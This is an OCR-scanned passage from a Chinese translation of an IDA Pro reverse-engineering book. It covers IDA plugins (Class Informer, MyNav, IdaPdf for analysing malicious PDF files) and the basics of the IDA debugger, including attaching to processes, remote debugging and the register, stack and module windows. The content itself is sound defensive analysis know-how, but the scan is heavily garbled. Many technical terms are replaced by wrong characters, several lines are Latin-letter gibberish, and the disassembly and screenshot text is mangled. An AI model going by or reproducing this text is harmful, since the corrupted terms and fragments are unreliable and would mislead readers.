( 利 )。 发 现 的 类 信息 包括 类 名 称 、 任 何 超级 类 的 名 称 ， 以 及 说 明 类 是 继承 目 单 一 基 类 ( [51])， 
还 是 继承 目 多 个 基 类 ( [MI] ), 对 于 发 现 的 每 个 vtable, Class Informer 还 会 对 所 有 与 类 有 关 的 RTTI 
相关 数据 结构 应 用 结构 模板 , 并 根据 Microsoft 的 名 称 改 编 方 案 命名 每 个 结构 及 类 的 vtable。 不 管 
逆 癌 工程 多 么 复杂 的 Visual C++ 代 码 ，Class Informer 都 可 以 为 你 节省 大 量 时 间 。 




















23.6 MyNav 


尽管 从 严格 意义 上 讲 ，Joxean Koret 开发 的 名 为 MyNav 的 Python 脚本 (参见 表 23-6 ) 并 非 一 
个 插件 ， 但 确实 是 一 个 有 用 的 IDA 扩展 。MyNav 非常 有 用 ， 在 Hex-Rays 2010 年 的 插件 编写 竞赛 
中 获得 了 一 等 奖 。" 加 载 二 进 制 文件 并 完成 初步 自动 分 析 后 ， 你 应 当 启 动 mynav.py 脚本 。 启 动 
MyNav 后 , 它 会 在 IDA 的 Edit » Plugins 沫 单 中 添加 20 个 新 的 菜单 项 ,以 便于 你 利用 各 种 新 功能 。 


表 23-6 MyNav 








名 称 MyNav 

作者 Joxean Koret 

发 布 Python 脚本 

价格 免费 

TER Ji X ai ea PARAR TH. 
信息 http://code.google.com/p/mynav/ 


MyNav 添加 的 功能 包括 一 个 图 数 级 ( 与 基本 的 块 级 相反 ORDEI Vs ( ZE Zynamics 的 BinNavi 
启发 而 开发 )、 其 他 图 形 功 能 ( 如 显示 任意 两 个 也 数 则 的 代码 路 径 )， 以 及 许多 旨 在 增强 IDA 的 
调试 功能 的 特性 。 

在 调试 方面 ，MyNav 会 记录 有 关 调 试 会 话 的 信息 ， 并 人 允许 你 使 用 一 个 调试 会 话 的 结 采 来 过 
滤 随 后 的 会 话 。 在 任何 调试 会 话 结束 后 ，MyNarv 会 显示 一 个 图 形 ， 仅 在 其 中 突出 显示 那些 在 会 
话 过 程 中 执行 的 图 数 。 使 用 MyNav 提供 的 功能 ， 你 可 以 快速 缩小 负责 程序 特定 操作 的 困 数 集 的 
范围 。 例 如 ， 如 果 你 对 负责 启动 网 络 连接 并 下 载 某 些 内 容 的 本 数 感 兴趣 ,可 以 创建 一 个 执行 除 启 
动 网 络 连接 以 外 的 任何 操作 的 会 话 ， 然 后 再 执行 另 一 个 会 话 , 并 在 其 中 创建 一 个 网 络 连接 。 排 除 
在 第 一 个 调试 会 话 中 执行 的 所 有 上 曙 数 后 ，MyNarv 最 终生 成 的 图 形 将 包含 与 那些 负责 启动 网 络 连 
接 的 函数 有 关 的 信息 。 如 果 你 试图 了 解 那 些 具有 庞大 二 进 制 代码 的 函数 ， 这 项 功能 会 非常 有 用 。 

AX MyNav 功能 的 详细 讨论 ， 请 参阅 Joxean 的 博客 >， 你 将 在 那里 找到 大 量 介 绍 MyNav D 
能 的 视频 。 




















(D 参见 http://www.hex-rays.com/contest2010/#mynav。 
(2) 参见 http://www.joxeankoret.com/blog/2010/05/02/mynav-a-python-plugin-for-ida-pro/。 
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23./ ldaPdf 


基于 文档 的 恶意 软件 正 变 得 越 来 越 常 见 。 恶 意 PDF 文件 就 是 一 个 典型 的 例子 ， 这 些 文档 文 
件 旨 在 利用 文档 查看 软件 中 的 漏洞 。 分 析 恶 意 PDF 文件 (或 任何 相关 的 文档 文件 ) 需要 你 了 解 
所 分 析 的 文件 的 结构 。 通 常 , 通过 仔细 分 析 这 些 文件 结构 ,你 可 以 发 现任 何在 文档 被 成 功 打 开 后 
将 执行 的 般 入 代码 ， 以 攻破 查看 该 文档 的 计算 机 。 现 有 的 一 些 PDF 分 析 工 具 主 要 针对 的 是 命令 
行 用 户 ， 其 日 的 是 提取 最 终 被 加 载 到 IDA 中 的 信息 ， 以 进行 深入 分 析 。 

IdaPdf (参见 表 23-7) 由 一 个 IDA 加 载 希 模块 和 一 个 DA 插件 模块 组 成 ， 这 两 个 模块 都 设 
计 用 于 分 析 PDF 文件 。IdaPdf 的 加 载 右 组 件 将 识别 PDF 文件 并 将 其 加 载 到 一 个 新 的 IDA 数据 库 
中 。 加 载 硕 负责 分 割 PDF 文件 。 在 加 载 过 程 中 ， 加 载 融 将 尽 一 切 努 力 提 取 并 过 滤 出 所 有 PDF it 
对 象 。 由 于 加 载 需 模块 会 在 加 载 过 程 完 成 后 退出 ， 这 时 就 需要 第 二 个 组 件 〈 即 IdaPdf 插 件 )， 以 
提供 初始 加 载 以 外 的 PDF 分 析 功 能 。 插 件 模块 在 确认 已 加 载 PDF 文件 后 ， 将 继续 枚 举 文件 中 的 
所 有 PDF 对 象 ， 并 打开 一 个 新 的 选项 卡 式 窗口 ， 其 中 列 出 每 一 个 PDF 对 象 。 下 面 的 代码 清单 列 
出 了 PDF Objects 窗口 所 包含 的 信息 。 





























Num Location Type Data Offs Data size Filters Filtered stream Filtered size Ascii 
17  000e20fe Stream 00062107 313 /FlateDecode | 000f4080 210 No 
35 00000010 Dictionary 00000019 66 Yes 
36 | 00000223 Dictionary  000002ac 122 Yes 
37  0000032e Stream 00000337 470 [/FlateDecode] 000f4170 1367 Yes 


SS 23-7 |dapdf 


名 称 IdaPdf 
作者 Chris Eagle 

发 布 C++ 源 代码 

价格 免费 

描述 用 于 分 析 并 浏览 PDF 文件 的 PDF 加 载 希 和 插件 
信息 http://www.idabook.com/idapdf/ 


Em BTE ER or, Y Mk rg. WRR, EAA FARRER , 
以 及 一 个 指 问 提取 出 的 、 未 过滤 数 据 的 指针 。 使 用 上 下 文 菜 单项 可 实现 轻松 导航 ， 以 查看 对 象 数 
据 或 任何 提取 的 已 过 滤 数 据 。 通 过 上 下 文 沫 单项 还 可 以 选择 是 提取 原始 对 象 数据 还 是 已 过 滤 的 对 
象 数据 。 Ascii 列 指出 ,插件 已 尽 最 大 努力 确定 对 和 象 的 原始 或 已 过 小 版 本 中 是 否 仪 包含 ASCH 数据 。 

最 后 ， 在 启动 之 后 ，IdaPdf 会 在 Edit » Other 下 添加 两 个 新 的 菜单 项 。 你 可 以 使 用 这 些 菜单 
项 突出 显示 数据 库 中 的 一 个 数据 块 , 然后 要 求 插件 对 这 些 数 据 进 行 Base64 解码 , 或 unescape? x 
些 数 据 ， 并 将 结果 复制 到 IDA 中 的 一 个 新 建部 分 。 这 些 示 编码 的 数据 通常 就 是 PDF 文件 中 的 恶 























(D 实现 JavaScript unescape 国 数 的 插件 。 
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意 负 载 。 由 于 插件 会 将 这 些 数 据 提取 到 新 的 IDA 段 中 ， 因 此 你 可 以 轻易 地 导航 到 这 些 数据 ， 并 
要 求 IDA 反 汇 编 部 分 或 全 部 数据 。 





23.8 小结 


任何 时 候 ， 如 果 你 希望 IDA 能 够 执行 某 种 任务 ， 都 应 花 时 间 考 虑 一 下 ， 其 他 人 是 否 也 有 相 
同 的 愿望 ; 以 及 是 否 有 人 已 经 采取 行动 ,执行 了 IDA 所 缺乏 的 功能 。 许 多 IDA 插件 正 是 在 这 个 
过 程 中 被 开发 出 来 。 绝 大 多 数 公开 发 布 的 插件 都 非常 简洁 ， 专 用 于 解决 非常 特殊 的 问题 。 除 了 可 
以 为 逆 癌 工程 问题 提供 可 能 的 解决 方案 外 ， 源 代码 可 用 的 插件 还 可 在 你 了 解 IDA SDK 的 有 趣 用 
法 时 提供 有 价值 的 参考 。 











IDA 调 试 需 
反 汇 编 吉 /调试 器 集成 








其 他 调试 功能 








IDA dëi zs 








P" 以 反 汇 编 硕 闻名 ， 众 所 周知 ， 它 是 对 二 进 制 文件 执行 静态 分 析 的 最 佳 工具 之 一 。 由 于 
现代 反 静 人 态 分 析 技 巧 很 复杂 ， 人 们 常常 将 静态 分 析 技 巧 与 动态 分 析 技 巧 结 合 起 来 ， 以 利用 
它们 二 者 的 优势 。 在 理想 情况 下 ， 所 有 这 些 工 具 应 集成 在 一 个 软件 包 中 。IDA 在 版 本 4.5 中 引入 
了 一 个 调试 锅 ， 从 而 巩固 了 IDA 作为 一 种 常用 逆向 工程 工具 的 地 位 。 在 随后 的 版 本 中 ，IDA 的 
调试 功能 不 断 扩 展 。IDA 的 最 新 版 本 能 够 在 各 种 不 同 的 平台 上 进行 本 地 和 远程 调试 , 并 支持 许多 
不 同 的 处 理 需 。IDA 还 可 以 配置 为 微软 的 WinDbsg 调试 需 的 前 端 ， 因 而 能 够 执行 Windows 内 核 
调试 。 

在 接 下 来 的 几 间 中， 我们 将 介绍 IDA 调试 右 的 基本 功能 ， 阐 释 如 何 使 用 调试 硕 协 助 模糊 代 
码 分 析 ， 以 及 远程 调试 Windows, Linux 或 OS X 二进制 文件 。 本 书 假定 读者 已 经 就 悉 调试 硕 的 
用 法 ， 但 在 逐步 介绍 IDA 调试 磊 的 功能 时 ， 我 们 将 复习 调试 硕 的 许多 基本 功能 。 


24.1 局 动 调试 器 


调试 器 通常 用 于 执行 以 下 两 种 任务 : 分 析 与 已 骨 溃 进程 有 关 的 内 存 映 像 (内核 转 储 )， 以 一 
种 完全 受 控 的 方式 执行 进程 。 调 试 会 话 以 选择 一 个 接受 调试 的 进程 为 起 点 。 通 篆 ,， 你 可 以 通过 两 
种 方式 选择 一 个 进程 。 第 一 ,大 多 数 调 试 器 能 够 依附 到 一 个 正在 运行 的 进程 上 (假设 用 户 拥 有 此 
权限 do 根据 你 所 使 用 的 调试 器 ,调试 器 本 身 也 许 能 够 提供 一 个 可 供 它 自己 选择 的 可 用 进程 列表 。 
如 果 调 斌 器 不 具备 这 样 的 能 力 ， 则 用 户 必 须 确定 想 要 依附 的 进程 的 ID， 然 后 命令 调试 右 依 附 到 
指定 的 进程 上 。 调 试 锅 依附 进程 的 具体 方式 因 操 作 系统 而 异 , 这 一 内 容 不 在 本 书 的 讨论 范围 之 列 。 
依附 一 个 现 有 的 进程 时 , 你 不 可 能 监视 或 控制 这 个 进程 的 初步 启动 顺序 ,因为 在 你 有 机 会 依附 进 
程 之 前 ， 它 的 所 有 启动 和 初始 化 代码 已 经 执行 完毕 。 

你 使 用 IDA 调试 器 依附 进程 的 方式 取决 于 IDA 当前 是 否 打 开 一 个 数据 库 。 如 果 没 有 数据 库 
打开 ， 那 么 你 可 以 使 用 Debugger » Attach 沫 单 ， 如 图 24-1 所 示 。 

通过 这 个 菜单 中 的 可 用 选项 ， 可 以 选择 不 同 的 IDA 调试 器 〈 远程 调试 将 在 第 26 章 讨论 )。 
这 个 菜单 中 的 选项 因 运 行 IDA 的 平台 而 有 所 不 同 。 选 择 本 地 调试 句 ，IDA 将 显示 一 个 正在 运行 
的 进程 列表 ， 你 可 以 依附 这 些 进 程 。 这 个 列表 的 一 个 例子 如 图 24-2 所 示 。 
































24.] 启动 调试 器 411 


À Choose process to attach to [sl E3 
















svchost.exe 
| 1296 wuaucdt.exe 
[ 5684 amd.exe 

| 4664 conhost.exe 
| 3860 bash.exe 

[ 4360 calc.exe 

| 5452 dlihost.exe 


| Debugger Options Windows Help 
Rn + la sali Qa ick ct f 4 
Local Bochs debugger 
| 
Local Windows debugger 
Remote ARMLinux/Android debugger 


Remate GDE debugger [ 3868 gimp-2.6.exe 
Remote Linux debugger | 5416 script-fu.exe H 
Remote Mac OS X debugger |5928 idaq.exe 

i idaq.exe S 
Remote Symbian debugger wë 
Remote WnCE debugger 
Remate Wndows debugger E Ce | o Sew | . "ep | 


Windbg debugger 





Line 1 of 69 





图 24-1 依附 到 任意 一 个 进程 图 24-2 ”调试 需 进 程 选 择 对 话 框 
选择 一 个 进程 后 ， 调 试 需 将 捕获 该 进程 的 内 存 快照 ,以 此 创建 一 个 临时 数据 库 。 除 这 个 正在 


运行 的 进程 的 内 存 映像 外 , 临时 数据 库 中 还 包含 该 进程 加 载 的 所 有 共 蛙 库 , 这 使 得 这 个 数据 库 比 
我 们 常见 的 数据 库 要 复杂 得 多 。 以 这 种 方式 依附 于 一 个 进程 的 缺点 在 于 : 在 反 汇编 这 个 进程 时 ， 
IDA 没有 多 少 可 用 的 信息 。 因 为 DA 的 加 载 融 绝 不 会 处 理 对 应 的 可 执行 文件 映像 ， 因 而 也 不 会 
对 相关 二 进 制 文件 进行 自动 分 析 。 实 际 上 , 一 旦 调试 器 依附 到 这 个 进程 ， 二进制 文件 中 唯一 被 反 
谍 编 的 指令 只 有 指令 指针 当前 指向 的 指令 。 依附 一 个 进程 会 立即 暂停 这 个 进程 ,以 便 你 在 恢复 进 
程 执 行 之 前 设置 断 点 。 
依附 于 一 个 正在 运行 的 进程 的 为 一 个 方法 是 在 依附 之 前 ,在 IDA 中 打开 相关 的 可 执行 文件 。 

有 数据 库 打 开 时 ，Debugger 菜单 将 呈现 一 种 截然 不 同 的 形式 ， 如 图 24-3 所 示 。 

[Debugger Options Windows Help 

[T] Quick debug view ` Ctrl42 

Breakpoints 


Watches 
Tracing 

















- - hé T 


> Start process F9 
Attach to process... 
Process options... 

DI Pause process 

O jeuminsteproess  Ciri+FZ 
Detadı from process 
Refresh memory 


Take memory snapshot 
3 Stepinto F7 
49 Step over F8 
Ql Run until returm 
@ Run to cursor F4 
Debugger options... 


Switch debugger... 
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如 果 此 有 末 单 (或 与 之 非常 相似 的 菜单 ) 并 未 显示 ， 则 你 可 能 尚未 为 用 户 当 前 打开 的 文件 类 型 
指定 调试 需 。 这 时 ，Debugger Select Debugger ( ld ze 选择 调试 名 ) 将 根据 当前 的 文件 类 型 
显示 适合 的 调试 锅 列 表 。 一 个 盟 型 的 调试 希 选 择 对 话 框 如 网 24-4 所 示 。 





3 Select a debugger [ X] 


Available debuggers 
€ Local Bochs debugger 


(C Local Win32 debugger 
(€ Remote GDE debugger 


C Remote Win32 debugger 





(^ Windbg debugger 


Default debuggers (autoseected for new databases): 
NONE 


矿 Setas default debugger 
"TN 





图 24-4 ”调试 器 选择 对 话 框 


通过 选中 该 对 话 框 的 部 的 复 选 框 , 你 可 以 为 当前 文件 类 型 选择 默认 调试 天 。 当 前 的 默认 调试 








Zë WRA ) 将 在 该 复 选 枉 上 方 显示 。 选 择 调试 硕 后 ， 你 随时 可 以 通过 Debug » Switch Debugger 
(调试 ”切换 调试 顶 ) Ae uH BOSE ae o 

选择 Debugger » Attach to Process C 调试 各 依附 到 进程 "DI. IDA 的 行为 各 有 不 同 , 具体 取 
决 于 在 活动 数据 库 中 打开 的 文件 的 类 型 。 如果 打开 的 文件 为 可 执行 文件 , IDA 将 显示 与 数据 库 中 
打开 的 文件 同名 的 所 有 进程 的 列表 。 如 果 IDA 找 不 到 名 称 相 匹配 的 进程 ，IDA 将 显示 包含 每 一 
个 正在 运行 进程 的 列表 , 让 你 目 己 来 选择 所 要 依附 到 的 正确 进程 。 你 可 以 随时 依附 到 任何 显示 的 
进程 ， 但 IDA 无 法 保证 启动 该 进程 使 用 的 是 加 载 到 打开 的 IDA 数据 库 中 的 同一 个 二 进 制 映像 。 

如 果 当 前 打开 的 数据 库 为 共享 库 ， 则 IDA 的 行为 会 有 所 不 同 。 在 Windows 系统 上 ，IDA 会 
对 显示 的 进程 列表 进行 过 滤 ， 只 留 下 那些 加 载 了 对 应 的 .dll 文件 的 进程 。 例 如 ， 如 果 你 当前 正在 
IDA 中 分 析 wininet.dll 文件 , 那么 当 你 选择 Debugger » Attach to Process 时 ,只 会 看 到 那些 当前 已 
加 载 wininet.dll 的 进程 。 在 Linux 和 OS X RAP, IDA 不 提供 这 种 过 小 功能 ， 并 且 会 显示 你 有 
权 依 附 到 的 所 有 进程 。 

另外 , 要 依附 于 一 个 正在 运行 的 进程 , 你 可 以 在 调试 硕 的 控制 下 局 动 一 个 新 进程 。 由 于 IDA 
没有 打开 数据 库 ， 你 可 以 通过 Debugger Run 来 启动 一 个 新 进程 。 如 果 IDA 打开 了 一 个 数据 库 ， 
则 可 以 通过 Debugger » Start Process 或 Debugger » Run to Cursor 启动 一 个 新 进程 。 如 果 使 用 前 一 
个 命令 ， 新 进程 将 继续 执行 ， 直 到 它 遇 到 一 个 断 点 〈 你 需要 在 选择 Debugger » Start Process 之 六 
设置 )， 或 者 直到 你 选择 使 用 Debugger Pause Process 使 该 进程 暂停。 使 用 Debugger» Run to 
Cursor 将 在 启动 新 进程 之 前 ， 在 当前 光标 位 置 设置 一 个 断 点 。 这 时 ， 新 进程 将 继续 执行 ， 下 到 它 
到 达 当 前 光标 位 置 或 者 遇 到 一 个 较 早 的 断 点 。 如 果 执 行 永远 无 法 到 达 当 前 光标 位 置 (或 任何 其 他 
Wir )， 该 进程 将 继续 运行 ， 和 直到 你 强制 暂停 或 终止 ( Debugger » Terminate Process ) 该 进程 。 
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在 调试 硕 的 控制 下 局 动 一 个 进程 〈 而 不 是 依附 一 个 现 有 的 进程 ) 是 监控 该 进程 执行 的 每 一 项 
操作 的 唯一 方法 。 在 进程 启动 之 前 设置 断 点 ,你 可 以 严密 监控 一 个 进程 的 整个 启动 顺序 。 如 果 你 
调试 的 是 一 个 模糊 程序 , 那么 控制 启动 顺序 就 显得 特别 重要 ， 因 为 你 往往 希望 在 去 模糊 程序 完成 
任务 之 后 ， 进 程 开始 执行 其 正常 操作 之 前 ， 立 即 暂 停 该 进程 。 

从 IDA 数据 库 启 动 进 程 的 男 一 个 好 处 在 于 IDA 会 在 启动 该 进程 之 前 ， 对 进程 映像 进行 初步 
分 析 。 与 将 调试 大 依附 于 现 有 进程 相 比 ， 这 样 做 得 到 的 反 汇 编 代 码 清单 的 质量 将 显 车 提高。 

IDA 调试 器 可 以 进行 本 地 调试 和 远程 调试 。 对 本 地 调试 而 言 ,你 只 能 调试 可 在 你 的 平台 上 运 
行 的 二 进 制 文 件 。 对 于 在 其 他 平台 或 CPU 上 运行 的 二 进 制 文件 ， 没 有 模拟 层 允 许 它们 在 IDA 的 
本 地 调试 可 中 和 运行。 至 于 远程 调试 ，IDA 日 市 了 许多 调试 服务 入， 包括 用 于 Windows 32/64, 
Windows CE/ARM, Mac OS X 32/64, Linux 32/64/ARM 和 Android 的 服务 器 。 调 试 服务 器 旨 在 与 
你 要 调试 的 二 进 制 文件 并 行 执 行 。 运 行 远程 调试 服务 善后 ，IDA 将 能 够 与 该 服务 器 通信 ， 在 远程 
计算 机 上 启动 目标 进程 ， 或 依附 到 该 进程 。 对 于 Windows CE ARM 设备 ，IDA 使 用 ActiveSync 
与 远程 设备 通信 ， 并 远程 安装 调试 服务 器 。IDA 还 能 够 与 GUN Debugger (gdb ) "fj gdbserver^£H 
件 通 信 , 或 与 链接 到 合适 的 gdb 远程 存根 “的 程序 通信 。 最 后 ,对 于 Symbian 设备 上 的 远程 调试 ， 
你 必须 安装 并 配置 Metrowerk 的 App TRK LE IDA 通过 串 行 端口 与 该 设备 通信 。 任 何 时 候 ,IDA 
只 能 作为 在 x86, x64, MIPS, ARM 和 PPC 处 理 器 上 运行 的 进程 的 调试 句 前 端 。 远 程 调试 将 在 
第 26 章 中 讨论 。 

和 任何 其 他 调试 套 一 样 ， 如 采 你 想 使 用 IDA 的 调试 硕 局 动 新 进程 ， 需 要 在 调试 主机 上 提供 
原始 的 可 执行 文件 ， 而 且 ， 你 需要 使 用 运行 IDA 的 用 户 的 完全 权限 执行 这 个 原始 的 二 进 制 文 件 。 
换 句 话说 ， 只 有 一 个 加 载 要 调试 二 进 制 文件 的 IDA 数据 库 并 不 够 。 使 用 IDA 调试 锅 分 析 和 恶意 软 
件 时 ， 了 解 这 一 点 尤其 重要 。 如 有 末 你 无 法 正确 控制 恶意 软件 样本 ， 你 用 于 调试 的 机 融 可 能 很 容 多 
受到 恶意 软件 的 感染 。 任 何 时 候 ， 只 要 你 选择 Debugger » Start Process (或 者 在 打开 数据 库 时 选 
FE Debugger » Attach to Process ), IDA 将 显示 如 下 所 示 的 调试 需 警 告 消 息 , 回 你 警告 这 种 可 能 性 。 
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对 于 这 个 警告 ， 如 果 你 选择 No, "Mos KERM IDA 主 窗口 中 消失 。 除 非 你 关闭 当前 
打开 的 数据 库 ， 你 才能 恢复 “调试 蘑 ” 采 单 。 
我 们 强烈 建议 你 在 一 个 沙 盒 环境 中 调试 恶意 软件。 与 之 相 比 , 我 们 在 第 21 章 中 讨论 的 x86 模 


CD 参见 http:/www.gnu.org/software/gdb/。 

(2) 参见 http:/www.sourceware.org/gdb/current/onlinedocs/gdb/Server.html#Server。 

(3) 参见 http:/www.sourceware.org/gdb/current/onlinedocs/gdb/Remote-Stub.html#Remote-Stub。 
(4) 参见 http:/www.tools.ext.nokia.com/agents/index.htm。 





414 $243 IDA 调试 器 








Ties B AP rt a Jens AI drei vm, ter er née AU T ml SAFES e 


24.2 ”调试 器 的 基本 显示 

无 论 你 以 什么 方式 启动 调试 硕 ， 只 要 你 感 兴 趣 的 进程 在 调试 兹 的 控制 下 被 暂停 ,IDA 就 会 进 
入 调试 名 模式 (而 非 正 常 的 反 汇 编 模 式 )， 这 时 ，IDA 将 显示 几 个 默认 窗口 。 上 默认 的 调试 送 和 窗口 
如 图 24-5 所 示 。 























:text:004010B0 sub 4010B0 proc near DATA XREF: start«27T1o 4j EAX 00000001 w 
pi SEELEN EBX00AB1821 w debug019:00AB182 
„text: var Bes dwo P= Tey 
.text:004010B0 var 4- dword SS -4 ECX6120E728 € cygwinl.d11:6120E728 
` text :004010B0 EDX004010B0 w sub 4010B0 
ESI 00AB182B ù debug019:00AB182B 
.text:004010B1 mov , esp EDI 00000000 ze 
*|.text:004010B3 sub sp, 8 EBP0022CD58 w Stack[00001164] :0022CD 
E Geier and r EEN ESP 0022CCFC € Stack[00001164] :0022CC 
.text: mov 
*|.text:004010BE add EIPOO04010BO0 w sub 4010B0 
*|.text:004010C1 add : EE». 00000292 
*].text:004010C4 shr 
*].text:004010C7 shl 
*].text:004010CA mov 
*].text:004010CD mov 
*j.text:004010D0 call 
*].text:004010D5 call 
.text:004010DA 
.text:004010DA loc 4010DA: ; CODE XREF: sub 4010B0*4241)j 
*].text:004010DA mov sp*Bü*var 8], offset aHelloWorld "Hello World!VXn" 
*|.text:004010E1l call i 
*].text:004010E6 mov 
*].text:004010ED call 
00000480 00401080: sub 401080 














00401000 Ba 89 E5 83 EC 28 83 E4 FO D9 7D FE OF B7 45 FE 
00401010 66 25 C0 FO 66 89 45 FE OF B7 45 FE 66 OD 3F 03 * El. i0022CDOO 00000001 











[t] 
00401020 £66 89 45 FE D9 6D FE C7 04 24 BO 10 40 00 E8 FD ziemi. I0022CD04  00A981E0 «< ug019:0( 
00401030 00 00 00 C7 44 24 08 00 op OO 00 C7 44 24 04 OO ...!DS$... 0022CDO08  00A980E0  debug019:00A980EO0 
00401040 00 00 00 C7 04 24 00 00 00 00 ER 11 01 00 00 CH EN 0022CDOC 00008000 
00401050 44 24 08 00 00 00 00 C7 44 24 04 00 00 00 00 c7 i 0022CD10  FFFFFFFF 
00000400 00401000: start 902 
4 














图 24-5 IDA 调试 器 窗口 


如 果 你 习惯 于 使 用 其 他 Windows 调试 器 (如 OllyDbg"zX Immunity Debugger”)， 你 的 第 一 个 
念头 可 能 是 ， 这 个 屏幕 并 未 显示 太 多 信息 。 这 主要 是 因为 IDA 默认 使 用 一 种 实际 可 读 的 字体 大 
小 。 如 果 你 “想念 ”其 他 调试 需 使 用 的 微型 字体 ， 你 可 以 通过 Options » Font (选项 字体 ) 3€ 
单 来 更 改 字 体 。 如 果 你 特别 喜欢 调试 器 窗口 的 某 个 布局 ， 还 可 以 使 用 已 保存 的 IDA. 桌面 
( Windows » Save Desktop )。 

如 图 24-5 所 示 ， 调 试 需 工具 栏 蔡 代 了 反 汇 编 工 具 栏 ， 在 调试 方面 ， 有 大 量 标准 工具 可 供 使 
用 ， 包 括 进程 控制 工具 和 上 断 点 操纵 工具 。 

在 调试 天 激活 时 ，IDAView-EIP(@ ) 反 汇 编 窗 口 是 一 个 默认 的 反 汇 编 风 格 的 窗口 ， 它 与 指 
令 指 针 寄 存 天 的 当前 值 同 步 。 如 末 IDA 检测 到 一 个 寄存 融 指 癌 反 汇编 窗口 中 的 一 个 内 存 位 置 ， 
该 寄存 冲 的 名 称 ( 而 不 是 该 寄存 天 指 癌 的 地 址 ) 将 在 窗口 左 侧 显示 。 在 图 24-5 中 ，EIP 指向 的 位 
置 在 IDA View-EIP 窗口 中 标记 出 来 ( 注意, 在 这 个 例子 中 , EDX 也 指 问 这 个 位 置 ),。 默认 情况 下 ， 




















D 参见 http://www.ollydbg.de/。 
(2) 参见 http://www.immunityinc.com/products-immdbg.shtml。 
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IDA 以 红色 突出 显示 断 点 ， 以 蓝 色 突出 显示 将 要 执行 的 下 一 条 指令 〈 指令 指针 指 回 的 指令 ), 与 
调试 硕 有 关 的 反 汇 编 代 但 清单 通过 标准 反 汇 编 模 式 下 的 反 汇 编 过 程 生成 。 因 此 ,IDA 调试 可 提供 
了 调试 硕 所 能 提供 的 最 佳 反 汇编 功能 。 此 外 ， 如 果 你 从 打开 的 IDA Zi enun, IDA 
将 能 够 基于 在 局 动 调试 大 之 前 执行 分 析 来 突出 显示 所 有 可 执行 的 内 容 。IDA 反 汇 编 由 进程 加 载 的 
任何 库 代 码 的 能 力 将 受到 更 大 限制 ， 因 为 IDA 没有 机 会 在 启动 调试 春之 前 分 析 相 关 .dll 文件 。 

“ 栈 视 图 ”( @ ) 窗口 是 男 一 个 标准 的 反 汇 编 窗口 , 它 主要 用 于 显示 进程 运行 时 栈 的 数据 内 容 。 
所 有 指 癌 栈 位 置 的 寄存 如 ( 本 例 中 为 ESP ) 如 “通用 寄存 大 ”窗口 (@ ) 中 所 示 。 通过 使 用 注释 ， 
IDA 尽 一 切 努 力 为 栈 上 的 每 一 个 数据 项 提供 上 下 文 信息 。 如 果 栈 项 为 内 存 地 址 ,IDA 会 尝试 将 该 
地 址 解析 为 函数 位 置 (这 有 助 于 强调 调用 因数 的 位 置 ) 如 采 栈 项 为 数据 指针 ， 则 显示 对 相关 数 
据 项 的 引用 。 剩 余 的 默认 显示 包括 十 六 进 制 窗口 (日 ,该 窗口 提供 内 存 的 标准 十 六 进 制 代 码 块 )、 
Modules 窗口 (4@， 其 中 显示 进程 镜像 中 当前 加 载 的 模块 列表 )， 以 及 Threads 窗口 (@@， 其 中 显 
示 当 前 进程 中 的 线程 列表 )。 双 击 列 出 的 任何 线程 ，IDA View-EIP 反 汇 编 窒 口 将 跳 转 到 所 选 线程 
中 的 当前 指令 ， 并 更 新 “通用 寄存 融 ” 窗 口 以 反映 所 选 线程 中 寄存 天 的 当前 值 。 

“通用 寄存 角 ”(@ ) AO (ILEI 24-6) 显示 CPU 的 通用 寄存 天 的 当前 内 容 。 通 过 Debugger 


























菜单 ， 你 还 可 以 打开 显示 CPU 段 、 浮 点 或 者 MMX 寄存 器 内 容 的 其 他 窗口 。 
E 





EAX 00000000 ta 
ù debug018:00A91847 

O vw 

tp 
Uu debugülg:00791851 


kW cygwinl.dll:6117959Fc7 
wu Stack[00000FAC]:0022ccp8 |PFO 
| & Stack[00000FAC]:0022ccco |CFO0 
€ sub 4010BO0431 
EFL 00000202 e 


图 24-6 “通用 寄存 大 ”窗口 


在 “通用 寄存 融 ” 窗 口中 ， 和 寄存 器 内 容 在 相关 寄存 需 名 的 右边 显示 ， 后 面 显 示 对 每 个 寄存 需 
内 容 的 说 明 ， 最 右边 的 列 中 显示 CPU 标志 位 。 庙 击 一 个 寄存 上 需 值 或 标志 位 ， 将 显示 一 个 Modify 
菜单 项 ， 你 可 以 更 改 任何 寄存 需 或 CPU 标志 的 值 。 使 用 菜单 项 可 以 快速 将 值 归 零 ， 切 换 值 ， 增 
大 或 减 小 值 ,切换 值 在 更 改 CPU 标记 位 时 特别 有 用 。 右 击 任何 寄存 器 值 ,还 可 以 访问 Open Register 
Window 菜单 项 。 选 择 Open Register Window, IDA 将 打开 一 个 新 的 反 汇 编 窗 口 ， 在 其 中 显示 以 
你 选择 的 寄存 右 保 存 的 内 存 位 置 为 中 心 的 内 存 位 置 。 如 果 你 无 意 中 关 闭 了 IDA View-EIP 或 IDA 
View-ESP 和 窗口， 可 以 对 相应 的 寄存 大 使 用 Open Register Window 命令 ， 重 新 打开 你 关闭 的 窗口 。 
如 果 一 个 寄存 需 指 向 一 个 有 效 的 内 存 位 置 , 那么 该 寄存 需 值 右 侧 的 直角 箭头 将 处 于 活动 状态 , 并 
以 黑色 突出 显示 。 单 击 一 个 活动 的 箭头 ， 当 前 的 反 汇 编 窗口 将 跳 转 到 相应 的 内 存 位 置 。 

Modules 窗口 显示 所 有 加 载 到 进程 内 存 空间 中 的 可 执行 文件 和 共享 库 。 双 击 任何 模块 名 称 ， 
将 打开 该 模块 导出 的 符号 列表 。 图 24-7 显示 的 是 kernel32.dll 的 内 容 。 如 果 你 想 在 那些 函数 的 入 
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口 处 设置 断 点 ， 符 号 列表 将 提供 一 种 容易 的 方法 来 奶 躁 加载 库 中 的 函数 。 


Module: kernel32.dll S BI 


D iGetStartupInfoA : 75501E10 

| E] CreateProcessw 7550204D 
75502082 

T] neaoadke yw 7550223C 
(09 ImitatomTable 75502478 





| B] createEventExw 75502408 
| DelayLoadFailureHook 7552028C 
| f] sieepconditionvariablecs 755318BE 

7553192C 
| EnumsSystemLanguageGroups W 75531A64 
| B] writeriecathe: 75531AA2 
Line 1of 1359 





图 24-7 模块 窗口 及 相关 模块 内 容 


其 他 调试 需 窗 口 可 以 使 用 各 种 调试 需 菜 单 选 项 来 访问 ， 我 们 将 在 24.3 T rey RE 
有 关 的 其 他 窗口 。 通 过 Views » Open Subviews 命令 ， 你 不 仅 可 以 打开 特定 于 调试 锅 的 窗口 ， 还 
可 以 打开 所 有 传统 的 IDA 子 窗口 ， 如 函数 和 段 。 


24.3 ”进程 控制 


